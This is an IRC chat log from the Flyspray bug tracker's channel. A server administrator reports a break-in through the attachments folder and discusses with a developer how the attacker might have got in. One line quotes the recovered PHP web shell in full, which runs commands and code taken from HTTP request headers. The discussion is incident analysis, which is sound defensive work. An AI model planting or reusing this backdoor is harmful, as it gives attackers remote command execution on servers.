02:25.16 | *** join/#flyspray cytrinox_ (n=cyx@Zea7f.z.pppool.de) |
08:32.37 | *** join/#flyspray floele (n=Miranda@p5DCA5606.dip.t-dialin.net) |
08:32.37 | *** mode/#flyspray [+o floele] by ChanServ |
09:50.37 | *** join/#flyspray brain0 (n=brain0@archlinux/developer/brain0) |
09:52.03 | brain0 | is there a known vulnerability in flyspray that would allow an attacker to execute code that has been uploaded as an attachment before? |
09:54.53 | brain0 | there was a process running with: /proc/$PID/exe -> /srv/http/flyspray-0.9.9.6/attachments/. /wunderbar_emporium/heh1 (deleted) |
09:55.07 | brain0 | however, script and cgi execution is disabled in the attachments folder |
11:30.46 | floele | we're not aware of any such vulnerabilities, otherwise we'd certainly fix it |
11:33.10 | brain0 | hmmm |
11:33.13 | brain0 | thank you for now |
11:33.35 | brain0 | it's weird anyway: execution of scripts on the attachments folder is disabled, but a .php script still got executed |
11:33.57 | brain0 | we 403'ed the folder for now, but some webapp must have allowed an upload and execution of the script into that folder |
11:34.52 | floele | what kind of script was running actually? |
11:39.35 | brain0 | <?php if($_SERVER['HTTP_CMD']) passthru($_SERVER['HTTP_CMD']); if($_SERVER['HTTP_EVL']) eval($_SERVER['HTTP_EVL]'); ?> |
11:39.55 | floele | ok, that's not so nice ;) |
11:40.35 | brain0 | not really |
11:41.01 | brain0 | I cannot say for sure it was even flyspray (there's also mediawiki running, and some more apps) |
11:41.07 | floele | so is /wunderbar_emporium/heh1 that script? |
11:41.17 | brain0 | only that all of this happened inside flyspray's attachment folder |
11:41.29 | brain0 | no, that is a binary which was compiled afterwards and executed |
11:42.31 | brain0 | that script was simply called ".php" |
11:43.36 | floele | hm...maybe the attacker needed a PHP-writable folder, which can be accessed from the outside? flyspray itself doesn't allow you to upload files with arbitrary names |
11:45.40 | brain0 | yes, I know that, I looked around in the source a bit |
11:46.04 | brain0 | so the attacker must have known in advance where that directory is and used a hole in another webapp |
11:46.08 | brain0 | maybe |
11:46.10 | brain0 | maybe not |
11:47.15 | floele | I just remember a similar script from an attack through phpBB...maybe you've got an old version running somewhere? |
11:49.10 | brain0 | we have punBB |
11:50.15 | brain0 | it's still weird that the attacker knew where to look for the attachments folder |
11:50.29 | brain0 | ah, maybe he had it from a php error message, which often include complete paths |
11:51.06 | floele | could be the case, yep |
11:51.06 | brain0 | so if - at some point - the attacker was able to trigger a php error in flyspray, he would have known the path /srv/http/flyspray-0.9.9.6 or even /srv/http/flyspray-0.9.9.6/attachments from the error message |
11:51.36 | floele | well, attachments is not hard to guess anyway |
11:51.56 | brain0 | well, thank you anyway, if we ever find out what happened, I will tell you (especially if it was flyspray's fault after all) |
11:52.43 | floele | yep, that'd be appreciated ;) |